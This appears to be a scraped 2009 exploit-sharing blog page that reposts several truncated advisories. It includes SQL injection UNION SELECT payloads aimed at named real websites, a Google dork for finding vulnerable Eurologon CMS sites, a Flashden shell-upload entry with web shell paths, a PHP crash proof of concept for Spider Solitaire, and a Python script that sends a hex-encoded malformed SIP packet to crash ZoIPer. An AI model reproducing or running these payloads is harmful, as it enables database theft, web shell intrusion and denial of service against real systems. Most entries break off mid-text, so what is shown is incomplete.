Praying the blessings of the seasonwill refresh you this Christmas andthroughout the coming y...
Wednesday, December 23, 2009
Monday, December 14, 2009
Eurologon CMS SQL Injection Vuln
Software : Eurologon Content Management SystemVendor : http://www.content-manager.it/Author : NoGeContact : noge[dot]code[at]gmail[dot]comBlog : http://evilc0de.blogspot.com/[o] Vulnerable filelinks.php[o] Exploithttp://localhost/[path]/links.php?id=[SQL][o] Proof of concepthttp://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*[o] Dork"Powered by Eurologon"[o] Notesthis is a private scri...
Saturday, November 28, 2009
Joomla Component com_lyftenbloggie Remote SQL injection vulnerability
############################################################################################### Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) #### Author : kaMtiEz (kamzcrew[at]yahoo[dot]com) #### Homepage : http://www.indonesiancoder.com #### Date : November 11, 2009 ###############################################################################################[ Software Information ][+] Vendor : http://www.lyften.com/[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html[+]...
Friday, November 27, 2009
Flashden Shell Upload Vulnerability
# Exploit Title: Flashden Shell Upload Vulnerability# Date: 26.12.2009# Author: DigitALL# Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members# Vendor: http://www.jurgenvisser.nl# Version: 2.0# Dork: inurl:"select_file2.php"# Application: Please Add Files ( Your Shell ) And Upload.# Shell: /test/shell.php -- /up/shell.php -- /upload/shell.php -- /beta/shell.php OR one back d...
Wednesday, November 25, 2009
Thursday, October 15, 2009
Spider Solitaire local crash proof of concept exploit for Windows XP SP2.
!--php/*Spider Solitaire (Windows XP SP2) Local Crash PoCBy SirGodwww.insecurity.rowww.twitter.com/SirGodLoading a corrupt save file(spider.sav) will result in a local crashof Spider Solitaire*/$username="pwn"; //Replace with your computer username$file="spider.sav";$junk="Spider Solitaire Local Crash";$handle = fopen($file, 'w') or die("Can't create file");fwrite($handle,$junk);fclose($handle);$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";if(!copy($file,$file2)){ die("Can't copy file");} else{ echo "File succesfully...
ZoIPer v2.22 Call-Info Remote Denial Of Service
#!/usr/bin/python# ZoIPer v2.22 Call-Info Remote Denial Of Service.# Remote Crash P.O.C.# Author: Tomer Bitton (Gr33n_G0bL1n)# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10## Vendor Notified on: 21/09/2009# Vendor Fix: Fixed in version 2.24 Library 5324## Bad Chars: \x20 , \x09import sysimport socketimport osdef main(argc , argv):if len(sys.argv) != 2:os.system("cls")sys.exit("Usage: " + sys.argv[0] + " \n")target_host = sys.argv[1]target_port = 5060evil_packet ="\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"os.system("cls")print...
